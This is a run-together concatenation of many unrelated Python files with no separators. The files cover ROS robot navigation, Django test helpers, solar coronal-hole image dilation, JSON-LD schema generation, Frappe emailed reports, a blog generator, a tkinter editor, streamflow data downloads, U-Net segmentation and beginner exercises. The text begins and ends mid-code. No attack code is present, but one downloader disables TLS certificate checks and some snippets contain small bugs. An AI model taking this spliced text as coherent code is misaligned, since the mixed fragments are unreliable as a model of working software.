self.assertDictEqual(self.command.expectation_line_changes.to_dict(), {'remove-lines': []}) fedecastellaro/create_autonomy #!/usr/bin/env python import math import rospy import actionlib from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal from geometry_msgs.msg import Pose, Quaternion from tf.transformations import quaternion_from_euler from std_msgs.msg import String import send_goals class receive_goals(): def __init__(self): self.new_pose = Pose() self.received_goals = [] rospy.Subscriber("/create1/move_base_goals", String, self.register_goal) self.listen_positions() def register_goal(self, position_goal): self.received_goals.append(position_goal.data) def listen_positions(self): r = rospy.Rate(1) # 1hz while not rospy.is_shutdown(): if self.received_goals: self.move_to_goal(self.received_goals.pop()) send_goals.print_menu() r.sleep() def move_to_goal(self, position_goal): param_path = "/table_positions/" + position_goal param_data = rospy.get_param(param_path, "None") if (param_data == "None"): rospy.logerr("[MOVE] Wrong position received") return rospy.logwarn("[MOVE] Moving to %s", position_goal) self.load_position(param_data['x'], param_data['y'], param_data['angle_raw']) client = actionlib.SimpleActionClient('move_base', MoveBaseAction) client.wait_for_server() goal = MoveBaseGoal() goal.target_pose.header.frame_id = "map" goal.target_pose.header.stamp = rospy.Time.now() goal.target_pose.pose.position.x = self.new_pose.position.x goal.target_pose.pose.position.y = self.new_pose.position.y goal.target_pose.pose.orientation = self.new_pose.orientation client.send_goal(goal) wait = client.wait_for_result() if not wait: rospy.logerr("[MOVE] Action server not available!") #rospy.signal_shutdown("Action server not available!") else: if client.get_result(): rospy.logwarn("[MOVE] Move success") else: rospy.logerr("[MOVE] Move not done") def load_position(self, x, 
y, angle_raw): q = quaternion_from_euler(0, 0, math.pi * angle_raw / 180) self.new_pose.position.x = x self.new_pose.position.y = y self.new_pose.orientation.x = q[0] self.new_pose.orientation.y = q[1] self.new_pose.orientation.z = q[2] self.new_pose.orientation.w = q[3] if __name__ == '__main__': rospy.init_node('move') receive_goals()from django.test import TestCase from datetime import ( datetime, time ) from gbe_forms_text import ( classbid_labels, class_schedule_options, event_type_options, ) from tests.gbe.test_gbe import TestGBE class TestScheduling(TestGBE): def assert_good_sched_event_form_wizard(self, response, eventitem): assert response.status_code is 200 if eventitem.__class__.__name__ == "Class": for label, detail in [ (classbid_labels['schedule_constraints'], ', '.join( [j for i, j in class_schedule_options if i in eventitem.schedule_constraints])), (classbid_labels['avoided_constraints'], ', '.join( [j for i, j in class_schedule_options if i in eventitem.avoided_constraints])), ('Space Needs', eventitem.get_space_needs_display())]: self.assert_label(response, label, detail) def assert_label(self, response, label, details): selection = '
%s
%s
' % ( label, details ) self.assertContains(response, selection) def assert_event_was_picked_in_wizard(self, response, event_type): checked_button = "" x = 0 for header in event_type_options: y = 0 for subitem in header[1]: if event_type == subitem[0]: checked_button = ( '') % ( event_type, x, y) y += 1 x += 1 self.assertContains( response, '') self.assertContains(response, checked_button, html=True) def assert_role_choice(self, response, role_type): self.assertContains( response, '' % (role_type, role_type), html=True) """Apply Dilation on CH Maps. Last Modified: May 6th, 2021 (Opal) """ import cv2 import numpy as np from chmap.coronal_holes.tracking.src.contour import Contour def get_kernel_width(t, gamma, n_p): """The dilation kernel width based on latitude. Parameters ---------- t: float theta latitude in [0, pi] gamma: int constant param of kernel width at the equator. n_p: int number of pixels in longitude. Returns ------- kernel width: int """ # piecewise function. alpha = np.arcsin(gamma / n_p) # due to symmetry. beta = np.pi - alpha # loop over each interval. if alpha < t < beta: return int(gamma / np.sin(t)) elif 0 <= t <= alpha: return n_p elif beta <= t <= np.pi: return n_p else: raise Exception("latitude value is invalid.") def latitude_weighted_dilation(grey_scale_image, theta, gamma, n_p): """Latitude weighted dilation on EUV Images. TODO: optimize. Parameters ---------- theta: (numpy array) theta coordinate numpy.linspace(0, pi, n_t) gamma: (int) dilation hyper parameter. n_p: (int) number of phi (longitude) pixels. grey_scale_image: (numpy array) grey scaled image or binary image Returns ------- dilated_image: (numpy array) """ # create copy of greyscaled_image dilated_image = np.zeros(grey_scale_image.shape, dtype=np.uint8) # latitude weighted dilation. for ii in range(len(theta)): # build the flat structuring element. width = get_kernel_width(t=theta[ii], gamma=gamma, n_p=n_p) kernel = np.ones(width, dtype=np.uint8) # save dilated strip. dilated_image[ii, :] = np.reshape(cv2.dilate(grey_scale_image[ii, :], kernel, iterations=1), n_p) return dilated_image def uniform_dilation_in_latitude(image, beta=8): """Uniform dilation in latitude - kernel height is the size of "beta" (int). Parameters ---------- beta: (int) structuring element height. Default is 8 pixels (this should change depending on the size of the input image. image: (numpy array) greyscale image. Returns ------- (numpy array) dilated image. """ # initialize the kernel size. kernel = np.ones(beta, dtype=np.uint8) # dilate in latitude. return cv2.dilate(image, kernel=kernel.T, iterations=1) def generate_ch_color(): """generate a random color Returns ------- list of 3 integers between 0 and 255. """ return np.random.randint(low=0, high=255, size=(3,)).tolist() def plot_dilated_contours(contours, Mesh): """Draw filled contours of dilated greyscale input image. Parameters ---------- contours: opencv contours. Mesh: MapMesh object. Returns ------- rbg: image where each contour has a unique color color_list: list of unique contour colors. """ # initialize RBG image. rbg = np.zeros((Mesh.n_t, Mesh.n_p, 3), dtype=np.uint8) # initialize contour color list. color_list = np.zeros((len(contours), 3)) # draw contours on rbg. 
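# Worked check of get_kernel_width() above, using illustrative values gamma = 10 and
# n_p = 360 longitude pixels: alpha = arcsin(10 / 360) ~= 0.0278 rad, beta = pi - alpha.
#   t = pi / 2 (equator)      -> int(10 / sin(pi / 2)) = 10 pixels
#   t = pi / 4 (mid-latitude) -> int(10 / sin(pi / 4)) = 14 pixels
#   t = 0.01   (t <= alpha)   -> saturates to the full width, n_p = 360 pixels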
for ii, contour in enumerate(contours): color_list[ii] = generate_ch_color() cv2.drawContours(image=rbg, contours=[contour], contourIdx=0, color=color_list[ii], thickness=cv2.FILLED) return rbg, color_list.astype(int) def find_contours(image, thresh, Mesh): """Find contours contours of a greyscale dilated image. Parameters ---------- image: (numpy array) gray scaled image. thresh: (float) binary threshold for contours. Mesh: MapMesh object. Returns ------- rbg image list of unique colors. """ # create binary threshold. ret, thresh = cv2.threshold(image, thresh, 1, 0) # find contours using opencv function. contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:] # draw contours. return plot_dilated_contours(contours=contours, Mesh=Mesh) def get_list_of_contours_from_rbg(rbg_image, color_list, Mesh, db_session, map_dir, frame_num=0, frame_timestamp=None): """Save all the image pixel coordinates that are assigned to each coronal hole (along with other coronal hole features- such as area, centroid, etc...). Parameters ---------- Mesh: MeshMap() object with image coordinates. rbg_image: rbg lon-lat classified coronal hole image. color_list: list of contour unique colors. frame_timestamp: frame time stamp, default is None. frame_num: frame id number, default is 0. db_session: database session. map_dir: directory to the saved magnetic data. Returns ------- coronal_hole_list : coronal hole list of Contour object. """ # initialize list of contours. coronal_hole_list = [] # loop over each contour saved. for color in color_list: # save pixel locations. mask = np.all(rbg_image == color, axis=-1) # find image pixel coordinates. contour_pixel = np.asarray(np.where(mask)) # save contour in a list if its not zero. coronal_hole_list.append(Contour(contour_pixels=contour_pixel, frame_num=frame_num, frame_timestamp=frame_timestamp, Mesh=Mesh, db_session=db_session, map_dir=map_dir)) return coronal_hole_list gitter-badger/biolink-model0 """ Generate JSONld """ import os from typing import Union, TextIO, Any, Optional from urllib.parse import urljoin from urllib.request import pathname2url import click from jsonasobj import as_json, loads from metamodel.metamodel import SchemaDefinition, ClassDefinitionName, SlotDefinitionName, TypeDefinitionName, \ ElementName, SlotDefinition, ClassDefinition from metamodel.utils.builtins import builtin_names, builtin_uri, Builtin from metamodel.utils.formatutils import camelcase, underscore from metamodel.utils.generator import Generator from metamodel.utils.yamlutils import YAMLRoot biolink_context = "https://github.com/biolink/biolink-model/raw/master/context.jsonld" meta_context = "https://raw.githubusercontent.com/biolink/biolink-model/master/metamodel/context.jsonld" class JSONLDGenerator(Generator): generatorname = os.path.basename(__file__) generatorversion = "0.0.2" valid_formats = ['jsonld'] def __init__(self, schema: Union[str, TextIO, SchemaDefinition], fmt: str = 'jsonld') -> None: super().__init__(schema, fmt) def _visit(self, node: Any) -> Optional[Any]: if isinstance(node, (YAMLRoot, dict)): if isinstance(node, YAMLRoot): node = node.__dict__ for k, v in list(node.items()): if v: new_v = self._visit(v) if new_v is not None: node[k] = new_v elif isinstance(node, list): for i in range(0, len(node)): new_v = self._visit(node[i]) if new_v is not None: node[i] = new_v elif isinstance(node, set): for v in list(node): new_v = self._visit(v) if new_v is not None: node.remove(v) node.add(new_v) elif isinstance(node, 
ClassDefinitionName): return ClassDefinitionName(camelcase(node)) elif isinstance(node, SlotDefinitionName): return SlotDefinitionName(underscore(node)) elif isinstance(node, TypeDefinitionName): return TypeDefinitionName(underscore(node)) elif isinstance(node, ElementName): return ClassDefinitionName(camelcase(node)) if node in self.schema.classes else \ SlotDefinitionName(underscore(node)) if node in self.schema.slots else \ TypeDefinitionName(underscore(node)) if node in self.schema.types else \ builtin_uri(str(node)) if str(node) in builtin_names else None elif str(node) in builtin_names: return builtin_uri(str(node)) return None def adjust_slot(self, slot: SlotDefinition) -> None: if slot.range in self.schema.classes: slot.range = ClassDefinitionName(camelcase(slot.range)) elif slot.range in self.schema.slots: slot.range = SlotDefinitionName(underscore(slot.range)) elif slot.range in self.schema.types: slot.range = TypeDefinitionName(underscore(slot.range)) elif slot.range in (Builtin.uri, Builtin.anytype): slot.range = '@id' elif slot.range in builtin_names and builtin_names[slot.range] not in (Builtin.anytype, Builtin.uri): slot.range = builtin_uri(slot.range) def visit_class(self, cls: ClassDefinition) -> bool: self._visit(cls) for slot_usage in cls.slot_usage.values(): self.adjust_slot(slot_usage) return False def visit_slot(self, aliased_slot_name: str, slot: SlotDefinition) -> None: self._visit(slot) self.adjust_slot(slot) def end_schema(self, context: str = biolink_context) -> None: # self._visit(self.schema) json_str = as_json(self.schema) json_obj = loads(json_str) base_prefix = self.default_uri() json_obj["@context"] = [context, {'@base': base_prefix}] if base_prefix else context json_obj["@id"] = self.schema.id print(as_json(json_obj, indent=" ")) @click.command() @click.argument("yamlfile", type=click.Path(exists=True, dir_okay=False)) @click.option("--format", "-f", default='jsonld', type=click.Choice(['jsonld']), help="Output format") @click.option("--context", default=biolink_context, help="JSONLD context file (default: biolink context.jsonld)") def cli(yamlfile, format, context): """ Generate JSONLD file from biolink schema """ print(JSONLDGenerator(yamlfile, format).serialize(context=context)) 0 # -*- coding: utf-8 -*- # Copyright (c) 2015, Frappe Technologies and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe, json from frappe import _ from frappe.model.document import Document from datetime import timedelta import frappe.utils from frappe.utils import now, global_date_format, format_time from frappe.utils.xlsxutils import make_xlsx from frappe.utils.csvutils import to_csv max_reports_per_user = 3 class AutoEmailReport(Document): def autoname(self): self.name = _(self.report) def validate(self): # self.validate_report_count() self.validate_emails() self.validate_report_format() def validate_emails(self): '''Cleanup list of emails''' if ',' in self.email_to: self.email_to.replace(',', '\n') valid = [] for email in self.email_to.split(): if email: frappe.utils.validate_email_add(email, True) valid.append(email) self.email_to = '\n'.join(valid) def validate_report_count(self): '''check that there are only 3 enabled reports per user''' count = frappe.db.sql('select count(*) from `tabAuto Email Report` where user=%s and enabled=1', self.user)[0][0] if count > max_reports_per_user + (-1 if self.flags.in_insert else 0): frappe.throw(_('Only {0} emailed reports are allowed per 
user').format(max_reports_per_user)) def validate_report_format(self): """ check if user has select correct report format """ valid_report_formats = ["HTML", "XLSX", "CSV"] if self.format not in valid_report_formats: frappe.throw(_("%s is not a valid report format. Report format should \ one of the following %s"%(frappe.bold(self.format), frappe.bold(", ".join(valid_report_formats))))) def get_report_content(self): '''Returns file in for the report in given format''' report = frappe.get_doc('Report', self.report) if self.report_type=='Report Builder' and self.data_modified_till: self.filters = json.loads(self.filters) if self.filters else {} self.filters['modified'] = ('>', frappe.utils.now_datetime() - timedelta(hours=self.data_modified_till)) columns, data = report.get_data(limit=self.no_of_rows or 100, user = self.user, filters = self.filters, as_dict=True) # add serial numbers columns.insert(0, frappe._dict(fieldname='idx', label='', width='30px')) for i in range(len(data)): data[i]['idx'] = i+1 if len(data)==0 and self.send_if_data: return None if self.format == 'HTML': return self.get_html_table(columns, data) elif self.format == 'XLSX': spreadsheet_data = self.get_spreadsheet_data(columns, data) xlsx_file = make_xlsx(spreadsheet_data, "Auto Email Report") return xlsx_file.getvalue() elif self.format == 'CSV': spreadsheet_data = self.get_spreadsheet_data(columns, data) return to_csv(spreadsheet_data) else: frappe.throw(_('Invalid Output Format')) def get_html_table(self, columns=None, data=None): date_time = global_date_format(now()) + ' ' + format_time(now()) report_doctype = frappe.db.get_value('Report', self.report, 'ref_doctype') return frappe.render_template('frappe/templates/emails/auto_email_report.html', { 'title': self.name, 'description': self.description, 'date_time': date_time, 'columns': columns, 'data': data, 'report_url': frappe.utils.get_url_to_report(self.report, self.report_type, report_doctype), 'report_name': self.report, 'edit_report_settings': frappe.utils.get_link_to_form('Auto Email Report', self.name) }) @staticmethod def get_spreadsheet_data(columns, data): out = [[_(df.label) for df in columns], ] for row in data: new_row = [] out.append(new_row) for df in columns: new_row.append(frappe.format(row[df.fieldname], df, row)) return out def get_file_name(self): return "{0}.{1}".format(self.report.replace(" ", "-").replace("/", "-"), self.format.lower()) def send(self): if self.filter_meta and not self.filters: frappe.throw(_("Please set filters value in Report Filter table.")) data = self.get_report_content() if not data: return attachments = None if self.format == "HTML": message = data else: message = self.get_html_table() if not self.format=='HTML': attachments = [{ 'fname': self.get_file_name(), 'fcontent': data }] frappe.sendmail( recipients = self.email_to.split(), subject = self.name, message = message, attachments = attachments ) @frappe.whitelist() def download(name): '''Download report locally''' auto_email_report = frappe.get_doc('Auto Email Report', name) auto_email_report.check_permission() data = auto_email_report.get_report_content() if not data: frappe.msgprint(_('No Data')) return frappe.local.response.filecontent = data frappe.local.response.type = "download" frappe.local.response.filename = auto_email_report.get_file_name() @frappe.whitelist() def send_now(name): '''Send Auto Email report now''' auto_email_report = frappe.get_doc('Auto Email Report', name) auto_email_report.check_permission() auto_email_report.send() def send_daily(): 
'''Check reports to be sent daily''' now = frappe.utils.now_datetime() for report in frappe.get_all('Auto Email Report', {'enabled': 1, 'frequency': ('in', ('Daily', 'Weekly'))}): auto_email_report = frappe.get_doc('Auto Email Report', report.name) # if not correct weekday, skip if auto_email_report.frequency=='Weekly': if now.weekday()!={'Monday':0,'Tuesday':1,'Wednesday':2, 'Thursday':3,'Friday':4,'Saturday':5,'Sunday':6}[auto_email_report.day_of_week]: continue auto_email_report.send() def send_monthly(): '''Check reports to be sent monthly''' for report in frappe.get_all('Auto Email Report', {'enabled': 1, 'frequency': 'Monthly'}): frappe.get_doc('Auto Email Report', report.name).send() # -*- coding: utf-8 -*- import os.path import mfr from mfr import config as core_config, RenderResult from mfr.core import get_assets_from_list from IPython.nbformat import current as nbformat from IPython.config import Config from IPython.nbconvert.exporters import HTMLExporter HERE = os.path.dirname(os.path.abspath(__file__)) TEMPLATE = os.path.join(HERE, 'templates', 'ipynb.html') # TODO These come from nb viewer, but conflict with the page. CSS_ASSETS = [ "pygments.css", # "style.min.css", # "theme/cdp_1.css", # "theme/css_linalg.css", ] c = Config() c.HTMLExporter.template_file = 'basic' c.NbconvertApp.fileext = 'html' c.CSSHTMLHeaderTransformer.enabled = False # don't strip the files prefix c.Exporter.filters = {'strip_files_prefix': lambda s: s} exporter = HTMLExporter(config=c) def render_html(file_pointer, **kwargs): try: content = file_pointer.read() nb = nbformat.reads_json(content) except ValueError: return RenderResult("Invalid json") # name, theme = get_metadata(nb) body = exporter.from_notebook_node(nb)[0] with open(TEMPLATE) as template: content = template.read().format( body=body, ) assets_uri_base = '{0}/mfr_ipynb'.format(mfr.config['STATIC_URL']) assets = { 'css': get_assets_from_list(assets_uri_base, 'css', CSS_ASSETS) } return RenderResult(content, assets) # Metadata not currently used # def get_metadata(nb): # # notebook title # name = nb.get('metadata', {}).get('name', None) or "untitiled.ipynb" # if not name.endswith(".ipynb"): # name += ".ipynb" # css_theme = nb.get('metadata', {})\ # .get('_nbviewer', {})\ # .get('css', None) # if css_theme and not re.match('\w', css_theme): # css_theme = None # return name, css_theme def get_stylesheets(*args): return [os.path.join(core_config['STATIC_URL'], path) for path in args] 0 # arranjos ou vetores, ou arrays são os mesmos def EncontrarElementosDuplicados(lista, m): # se a lista = vazia returna zero if not lista: return[] tabelaDeFrequncia = [0] * m duplicadas = [] for i in range(len(lista)): for ii in range(i + 1, len(lista)): if lista[i] == lista[ii]: duplicadas.append(lista[ii]) return duplicadas print(f'elementos duplicados:') elementos = EncontrarElementosDuplicados([1,2,1,1,1,1,2,2,3,4,8,8,9,5,7,5,6,90,99,99,99,10,54,55,55,41,63,45,69,74], 99) for elemento in elementos: print(f'{elemento} ', end='') print()# coding: utf-8 from . 
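# A standalone sketch of the duplicate-finder above using collections.Counter instead of the
# O(n^2) nested loops; it reports each repeated value once and drops the unused frequency
# table. Illustrative alternative only, not part of the original script.
from collections import Counter

def find_duplicates(values):
    # Keep every value that occurs more than once in the input list.
    return [value for value, count in Counter(values).items() if count > 1]

# Example: find_duplicates([1, 2, 1, 3, 2]) == [1, 2]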
import utils def backup(archive): utils.archive_dirs(archive, "/etc/puppet", "puppet") def restore(archive): utils.extract_tag_to(archive, "puppet", "/etc/puppet") pythonPackages/pypies/testCustomJavaDeserialization.py import dynamicserialize from dynamicserialize.dstypes.java.awt import Point from dynamicserialize.dstypes.com.raytheon.uf.common.pypies import PointTest def readObject(): f = open('/tmp/javaPoints') data = f.read() f.close() return data def writeObject(): data = PointTest() p1 = Point() p1.setX(26) p1.setY(9) p2 = Point() p2.setX(144) p2.setY(-7) points = [p1, p2] data.setPoints(points) bytes = dynamicserialize.serialize(data) f = open('/tmp/pythonPoints', 'w') f.write(bytes) f.close() print "wrote to /tmp/pythonPoints" def main(): data = readObject() obj = dynamicserialize.deserialize(data) print obj print obj.getPoints() writeObject() if __name__ == '__main__': main()import os import sys import json import argparse import shutil from datetime import datetime import logging try: # import for python2.7 from SimpleHTTPServer import SimpleHTTPRequestHandler from BaseHTTPServer import HTTPServer except ImportError: # import for python3 from http.server import SimpleHTTPRequestHandler from http.server import HTTPServer from .page_generator import PageGenerator log = logging.getLogger(__name__) class BlogAction: def __init__(self, config): self.config = config def serve(self): """ Run web-server to test static site """ os.chdir(self.config["render_dir"]) server_addr = ('localhost', 8000) request_handler = SimpleHTTPRequestHandler httpd = HTTPServer(server_addr, request_handler) log.info("Serving at http://{0}:{1}".format(*server_addr)) httpd.serve_forever() def build(self): """ Generate finalized html. Also fill metadata for new drafts """ page_generator = PageGenerator(self.config) page_generator.generate_all() def post(self, slug, draft_type): """ Make a new page draft with given slug """ now = datetime.now() draft_path = os.path.join(self.config['pages_dir'], now.strftime("%Y-%m-%d__") + slug + '.md') date_time = now.strftime(self.config['date_format']) with open(draft_path, 'w') as f: f.write(self.config['draft_templates'][draft_type]['content'] .format(slug=slug, date_time=date_time)) log.info(draft_path) def create_blog(blog_dir): blog_path = os.path.join(os.getcwd(), blog_dir, '_blog') pages_path = os.path.join(blog_path, 'pages') os.makedirs(pages_path) engine_path = os.path.dirname(os.path.realpath(__file__)) shutil.copytree(os.path.join(engine_path, 'templates'), os.path.join(blog_path, 'templates')) shutil.copyfile( os.path.join(engine_path, 'default.json'), os.path.join(blog_path, 'default.json')) shutil.copyfile( os.path.join(engine_path, 'draft_templates.json'), os.path.join(blog_path, 'draft_templates.json')) log.info("Blog created. 
\ncd {0} && blo post hello-worlds".format(blog_dir)) def parse_args(): """ How to use blog: - build -- generate htmls in 'render_dir' - serve -- run webserver for testing in 'render_dir' - post "slug" -- greate new page with given title """ parser = argparse.ArgumentParser() parser.add_argument('action', nargs='+') parser.add_argument('--config', default='default.json') parser.add_argument('--type', default='post') return parser.parse_args() def main(): opts = parse_args() if opts.action[0] == 'create': if len(opts.action) == 1: log.info("Add blog folder name") return 1 # try: # for python2.7 blog_dir = unicode(opts.action[1], 'utf-8') except NameError: # for python3 blog_dir = opts.action[1] create_blog(blog_dir) return 0 config_path = os.path.join(os.getcwd(), '_blog', opts.config) config = json.load(open(config_path)) draft_templates_path = os.path.join(os.getcwd(), '_blog', 'draft_templates.json') config['draft_templates'] = json.load(open(draft_templates_path)) blog_action = BlogAction(config) if opts.action[0] == 'build': blog_action.build() if opts.action[0] == 'serve': blog_action.serve() elif opts.action[0] == 'post': try: # for python2.7 slug = unicode(opts.action[1], 'utf-8') except NameError: # for python3 slug = opts.action[1] blog_action.post(slug, opts.type) if __name__ == "__main__": log.addHandler(logging.StreamHandler(sys.stdout)) log.setLevel(logging.DEBUG) sys.exit(main())python_common/gui_tkinter/text_editor_ui.py0 from tkinter import * from tkinter import filedialog as fd textString = "" root = Tk() root.title("my editor") frame = Frame(root) frame.pack() scrollbar = Scrollbar(root) scrollbar.pack(side=RIGHT, fill=Y) text = Text(root, yscrollcommand=scrollbar.set) text.pack(side=BOTTOM) filename = "" def read_text(): global filename filename = fd.askopenfilename() print("read file:" + filename) if filename != "": with open(filename, encoding='gbk') as f: text_string = f.read() text.delete('1.0', END) text.insert(INSERT, text_string) text.insert(END, "") def save_text(): global filename print("save file as:" + filename) write_text = text.get('1.0', END) if filename != "": with open(filename, 'w', encoding='gbk') as f: f.write(str(write_text)) open_button = Button(frame, text="open", command=read_text) open_button.pack(side=LEFT) save_button = Button(frame, text="save", command=save_text) save_button.pack(side=LEFT) root.mainloop() #!/usr/bin/python # Adapted from code in the below URL: # https://github.com/petuum/public/blob/release_0.93/apps/matrixfact/sampledata/make_synth_data.py import sys, random if len(sys.argv) <> 4: print 'Creates sparse, block-diagonal synthetic data to test the Petuum NMF application' print '' print 'Usage: python %s ' % sys.argv[0] print '' print 'Creates a block-diagonal matrix, where each diagonal block has width and height' print '; is the total number of diagonal blocks. The upper left block' print 'is set to 1, and the i-th diagonal block is set to i. All blocks are output to .' print '' print 'When is input to Petuum NMF with rank = , the resulting L,R' print 'factors should be clearly split into groups of rows each.' print 'Thus, one may use this script to test Petuum NMF on arbitrarily-sized data. Note that the NMF' print 'initial step size will have be tuned to each new matrix, to prevent algorithm divergence.' print '' print 'Example:' print 'python %s 3 3 test-matrix' % sys.argv[0] print 'This creates a 9-by-9 matrix with 3 diagonal blocks of width 3, and outputs it to test-matrix.' 
sys.exit(1) block_width = int(sys.argv[1]) num_diag_blocks = int(sys.argv[2]) output_file = sys.argv[3] N = block_width * num_diag_blocks with open(output_file,'w') as g: row_entries = {} for b in range(num_diag_blocks): for subrow in range(block_width): row_idx = subrow + b*block_width # Generate block diagonal for j in range(b*block_width,(b+1)*block_width): if not row_idx in row_entries: row_entries[row_idx] = {} row_entries[row_idx][j] = b+1 # Print entries for i in range(num_diag_blocks*block_width): for j in range(num_diag_blocks*block_width): if not j in row_entries[i]: ele = 0 else: ele = row_entries[i][j] g.write('%d\t' % (ele)) g.write('\n')import pandas as pd import requests import io import numpy as np import geoglows #df = pd.read_csv('/Users/student/Dropbox/PhD/2020_Winter/Dissertation_v9/South_America/Colombia/IDEAM_Stations_v2.csv') df = pd.read_csv('C:\\Users\\jsanch3z\\Dropbox\\PhD\\2020_Winter\\Dissertation_v9\\South_America\\Colombia\\Stations_Selected_Colombia_v3.csv') IDs = df['Codigo'].tolist() #COMIDs = df['COMID'].tolist() COMIDs = df['new_COMID'].tolist() Names = df['Nombre'].tolist() Rivers = df['Corriente'].tolist() # #data = pd.read_csv('/Users/student/Dropbox/PhD/2020 Winter/Dissertation_v9/South_America/Colombia/row_data/Excel_2021_06_03.csv') # data = pd.read_csv('C:\\Users\\jsanch3z\\Dropbox\\PhD\\2020_Winter\\Dissertation_v9\\South_America\\Colombia\\row_data\\Excel_2021_06_03.csv') # data.rename(columns={'Fecha': 'Datetime'}, inplace=True) # data.set_index(['Datetime'], inplace=True, drop=True) # data.index = pd.to_datetime(data.index) # # for id in IDs: # # print(id) # station_data = data.loc[data['CodigoEstacion'] == id] # station_data = station_data.drop(['CodigoEstacion', 'NombreEstacion', 'Latitud', 'Longitud', 'Altitud'], axis=1) # station_data.rename(columns={'Valor': 'Streamflow (m3/s)'}, inplace=True) # # index = pd.date_range(station_data.index[0], station_data.index[len(station_data.index) - 1], freq='D') # data_nan = [np.nan] * len(index) # pairs = [list(a) for a in zip(index, data_nan)] # df2 = pd.DataFrame(pairs, columns=['Datetime', 'Values']) # df2.set_index(['Datetime'], inplace=True, drop=True) # # result = pd.concat([df2, station_data], axis=1, sort=False) # result = result.drop(['Values'], axis=1) # # #result.to_csv("/Users/student/Github/Bias_Correction/Colombia/Updated/{0}.csv".format(id)) # result.to_csv("C:\\Users\\jsanch3z\\Dropbox\\PhD\\2020_Winter\\Dissertation_v9\\South_America\\Colombia\\Forecast\\Observed_Data\\Streamflow\\{0}.csv".format(id)) # # print('Terminado con los observados') for comid in COMIDs: print(comid) url = 'https://geoglows.ecmwf.int/api/HistoricSimulation/?reach_id={0}&return_format=csv'.format(comid) s = requests.get(url, verify=False).content simulated_df = pd.read_csv(io.StringIO(s.decode('utf-8')), index_col=0) #simulated_df = geoglows.streamflow.historic_simulation(comid, forcing='era_5', return_format='csv') simulated_df[simulated_df < 0] = 0 simulated_df.index = pd.to_datetime(simulated_df.index) simulated_df.index = simulated_df.index.to_series().dt.strftime("%Y-%m-%d") simulated_df.index = pd.to_datetime(simulated_df.index) simulated_df.to_csv("C:\\Users\\jsanch3z\\Dropbox\\PhD\\2020_Winter\\Dissertation_v9\\South_America\\Colombia\\Historical\\Simulated_Data\\ERA_5\\{0}.csv".format(comid)) print('Terminado con los simulados') from model import * from data import * #os.environ["CUDA_VISIBLE_DEVICES"] = "0" from PIL import Image from resizeimage import resizeimage from skimage import color from 
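# A Python 3 sketch of the block-diagonal generator above (the original targets Python 2,
# e.g. the `<>` operator and print statements): block b fills rows and columns
# b*block_width .. (b+1)*block_width - 1 with the value b+1 and leaves everything else 0.
# Standalone illustration; the original script additionally writes the matrix to a
# tab-separated output file.
def block_diagonal(block_width, num_diag_blocks):
    n = block_width * num_diag_blocks
    matrix = [[0] * n for _ in range(n)]
    for b in range(num_diag_blocks):
        start, stop = b * block_width, (b + 1) * block_width
        for i in range(start, stop):
            for j in range(start, stop):
                matrix[i][j] = b + 1
    return matrix

# Example: block_diagonal(2, 2) == [[1, 1, 0, 0], [1, 1, 0, 0], [0, 0, 2, 2], [0, 0, 2, 2]]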
skimage import io import cv2 from matplotlib import pyplot as plt import numpy as np import glob from array import array import statistics from splitter import * for filename in glob.glob('data/membrane/train/label/*.png'): #assuming gif #cover.save(filename, im.format) im = cv2.imread(filename) ret,thresh1 = cv2.threshold(im,127,255,cv2.THRESH_BINARY) cv2.imwrite(filename, thresh1) for filename in glob.glob('data/membrane/train/image/*.png'): #assuming gif #cover.save(filename, im.format) im = cv2.imread(filename,0) im = cv2.equalizeHist(im) cv2.imwrite(filename, im) for filename in glob.glob('data/membrane/test/*.png'): #assuming gif #cover.save(filename, im.format) im = cv2.imread(filename,0) im = cv2.equalizeHist(im) cv2.imwrite(filename, im) """upper is for contrast enhancement of images""" data_gen_args = dict(rotation_range=0.6, width_shift_range=0.07, height_shift_range=0.07, shear_range=0.09, zoom_range=0.07, horizontal_flip=True, fill_mode='nearest') target_size=(1024,1024) myGene = trainGenerator(1,'data/membrane/train','image','label',data_gen_args,save_to_dir = 'data/membrane/train/aug',target_size=target_size) model = unet() model_checkpoint = ModelCheckpoint('unet_membrane.hdf5', monitor='loss',verbose=1, save_best_only=True) model.fit_generator(myGene,steps_per_epoch=10000,epochs=4 ,callbacks=[model_checkpoint]) #predict using stored model model.load_weights("unet_membrane.hdf5") testGene = testGenerator("data/membrane/test",target_size=target_size) results = model.predict_generator(testGene,23,verbose=1) saveResult("data/membrane/test",results) #black and white all predicted values for filename in glob.glob('data/membrane/test/*_predict.png'): #assuming gif #cover.save(filename, im.format) im = cv2.imread(filename) ret,thresh1 = cv2.threshold(im,127,255,cv2.THRESH_BINARY) cv2.imwrite(filename, thresh1) #measure lenght of path image path="data/membrane/test/6" left=array("i") right=array("i") image_in=cv2.imread(path+"_predict.png") image_in=cv2.cvtColor(image_in,cv2.COLOR_BGR2GRAY) cv2.imshow('image',image_in) cv2.waitKey(0) cv2.destroyWindow('image') for i in range(image_in.shape[0]): counter=0 counter2=0 for j in range(image_in.shape[1]): if image_in[i,j] < 100: if j>(image_in.shape[1])*.5 and j<(image_in.shape[1])*.75: counter2 += 1#right pillar elif j<(image_in.shape[1])*.5 and j>(image_in.shape[1])*.25: counter += 1#left pillar right.append(counter2) left.append(counter) elements = np.array(right) mean = np.mean(elements, axis=0) sd = np.std(elements, axis=0) final_list_right = [x for x in right if (x > mean - 2 * sd)] final_list_right = [x for x in final_list_right if (x < mean + 2 * sd)] elements = np.array(left) mean = np.mean(elements, axis=0) sd = np.std(elements, axis=0) final_list_left = [x for x in left if (x > mean - 2 * sd)] final_list_left = [x for x in final_list_left if (x < mean + 2 * sd)] #print(final_list_left,final_list_right) print(np.mean(final_list_left)*.5,np.mean(final_list_right)*.5) #display visual measurements disp(path,target_size) jinkyukim-me/StudyPython # if문 age = int(input("나이가 어떻게 되세요?")) if age < 19: print("미성년자는 접근할 수 없습니다.") if age >= 19:print("성인입니다.") # 비교연산자 num = int(input("숫자를 입력해주세요 : ")) if num == 3: print("3이다") if num > 5: print("5보다 크다") if num < 5: print("5보다 작다") country = input("둘 중에 하나를 입력하세요(Korea/korea) : ") if country == "Korea": print("한국입니다.") if country == "korea": print("대한민국입니다.") # a보다는 b가 더 큰 문자, 사전의 뒤쪽에 나오는 문자열을 더 큰 것으로 평가 if ("korea" > "japan"): print("한국이 더 크다") if ("korea" < "japan"): print("일본이 더 크다") if 
